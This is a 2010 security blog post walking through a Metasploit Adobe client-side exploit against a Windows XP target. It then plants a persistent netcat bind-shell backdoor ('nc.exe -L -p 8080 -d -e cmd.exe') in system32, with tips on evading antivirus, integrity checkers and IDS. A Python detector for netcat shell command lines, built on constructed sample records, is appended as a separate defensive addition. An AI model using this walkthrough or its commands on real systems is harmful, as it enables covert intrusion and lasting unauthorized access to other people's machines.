Welcome to the SecurityisFutile blog

I welcome comments and suggestions, I take criticism very lightly (at least most of the time). My goal for this blog is to document various experiments and research projects I feel are both relevant and prominent in the field of computer security (or lack thereof) and share my results and experiences with other fellow computer security enthusiasts. Most of my topics are based solely on open source technology and methodology, mostly due to availability and cost. I believe that effective security measures help keep people honest with their technology, for the most part. Security is futile (useless), or at least it feels that way when an inspired opportunist comes around and exploits your weaknesses. With that being said, I leave you with a quote of inspiration: "There is no security on this earth, there is only opportunity." -- General Douglas MacArthur

Friday, May 28, 2010

Netcat is a useful security/networking tool that has been around since the dawn of the dinosaurs. However, it still holds credibility amongst security professionals even today, probably due to its inherent features and versatile design, which make it an effective "swiss army knife" for most computer enthusiasts. Penetration tests sometimes require the security professional to maintain access to the compromised target even when he loses the original avenue of attack. A network IPS, firewall or anti-virus defense mechanism could trip after the fact, for example when trying to implant a Trojan or virus as your backdoor. This could cause your Metasploit meterpreter shell to lose its connection to the session/target and could even create a new policy blocking your IP address. After working so hard to get the client-side attack to exploit, you wouldn't want all of your hard work to go in vain.

Using netcat (or cryptcat) to pop command shells from the compromised target on alternate ports/IP addresses is still an effective way of staying under the radar and maintaining access to the compromised target. For instance, not all anti-virus software will detect the presence of the nc.exe program. It's not to say you couldn't do all of this with Metasploit or some other tool, but it's cool to use alternative methods and change it up sometimes ;-)

Pop a shell on a windows target using the client-side Metasploit Universal Adobe exploit

Upload "nc.exe" to a safe location (maybe some place where a virus scanner wouldn't be running and an integrity checking tool wouldn't be monitoring) on the compromised target and start a netcat/cryptcat listener running the "cmd.exe" command on a common port

On the attack system, use netcat to connect to the listening port on the compromised system...bam...instant command shell (if you use cryptcat you will have encryption to help evade a network IDS)

Perform as many times as necessary, but not too much! Remain stealthy!

Steps (Modify as necessary. This is just a guide):

On the attack image, launch the Metasploit 3.x command console

command: msfconsole

Use the Adobe Acrobat universal exploit. You can search for it in msfconsole

command: search adobe

command: use exploit name

You should now be using the exploit name. Set the options for the payload/exploit

On your Windows XP target, open a browser window and put in http://ipaddress/adobe/urlstring to launch the exploit (Adobe should attempt to run the document and hang)

On your attack system see if the exploit ran successfully

command: sessions -i number

(Metasploit will tell you if the exploit was successful and if a session was created with the compromised system. If not...try again or try another exploit/avenue of attack...)

If all went well you should now be in your new session.

Now use the meterpreter shell to upload the nc.exe program to the compromised system

Copy the nc.exe file to the attack system's installdirectory/Framework3/msf3 directory. This is where your meterpreter shell will attempt to grab the nc.exe program from when you use the upload function

Now run the upload command in the meterpreter shell to upload nc.exe to the target's system32 directory

command: upload -r nc.exe

Now use meterpreter to execute the nc.exe file and run as a service in the background

command: execute -f "nc.exe -L -p 8080 -d -e cmd.exe" (The process should be created on the compromised system)

Use netcat on your attack image to connect to the port hosting the command shell (cmd.exe)

command: nc -v -n targetip 8080

Now you should have another remote back door. Connect as many times as you want and open up as many shells as you need. Then close out of your meterpreter session, close Metasploit.....look....you still have a shell :-)
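The flip side of the procedure above is how a defender spots it: the post itself notes that anti-virus may not flag nc.exe, so the reliable signal is the command line ("-L -p 8080 -d -e cmd.exe") in process-creation telemetry. The following Python scanner is an added example, not code from the original post; the process records it parses are constructed samples in a made-up (host, image, command line) shape, not a real log format.

```python
import re

# Constructed sample process-creation records (host, image path, command line).
# These are made-up examples for the demo, not real log data.
SAMPLE_EVENTS = [
    ("wkstn01", r"C:\Windows\system32\nc.exe", "nc.exe -L -p 8080 -d -e cmd.exe"),
    ("wkstn01", r"C:\Windows\system32\cmd.exe", "cmd.exe /c dir"),
    ("wkstn02", r"C:\Users\bob\cryptcat.exe", "cryptcat.exe -l -p 443 -e cmd.exe"),
    ("srv01", r"C:\tools\nc.exe", "nc.exe -v -n 10.0.0.5 80"),
]

NETCAT_NAMES = {"nc", "nc64", "ncat", "netcat", "cryptcat"}
EXEC_FLAGS = {"-e", "-c"}    # hand the connection to a program (a shell)
LISTEN_FLAGS = {"-l", "-L"}  # listen; -L is the Windows "listen harder" flag

def _value_after(argv, flags):
    """Return the token following the first occurrence of any flag, or None."""
    for i, tok in enumerate(argv[:-1]):
        if tok in flags:
            return argv[i + 1]
    return None

def classify(host, image, cmdline):
    """Classify one process-creation record. Returns a finding dict for any
    netcat-family binary, with severity derived from its flags, else None."""
    basename = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    stem = re.sub(r"\.exe$", "", basename)
    if stem not in NETCAT_NAMES:
        return None
    argv = cmdline.split()
    has_exec = any(tok in EXEC_FLAGS for tok in argv)
    has_listen = any(tok in LISTEN_FLAGS for tok in argv)
    if has_exec and has_listen:
        severity, kind = "high", "bind shell"      # exactly the post's backdoor
    elif has_exec:
        severity, kind = "high", "reverse shell"   # -e without -l: calls home
    elif has_listen:
        severity, kind = "medium", "listener"      # port open, no shell bound
    else:
        severity, kind = "low", "client connection"
    return {
        "host": host, "tool": stem, "kind": kind, "severity": severity,
        "port": _value_after(argv, {"-p"}),
        "program": _value_after(argv, EXEC_FLAGS),
    }

def scan(events):
    """Run classify() over (host, image, cmdline) records, dropping non-hits."""
    return [f for f in (classify(*ev) for ev in events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Pairing a high-severity hit with a new inbound listening socket on the same host (here port 8080) gives a second, independent confirmation before anyone responds.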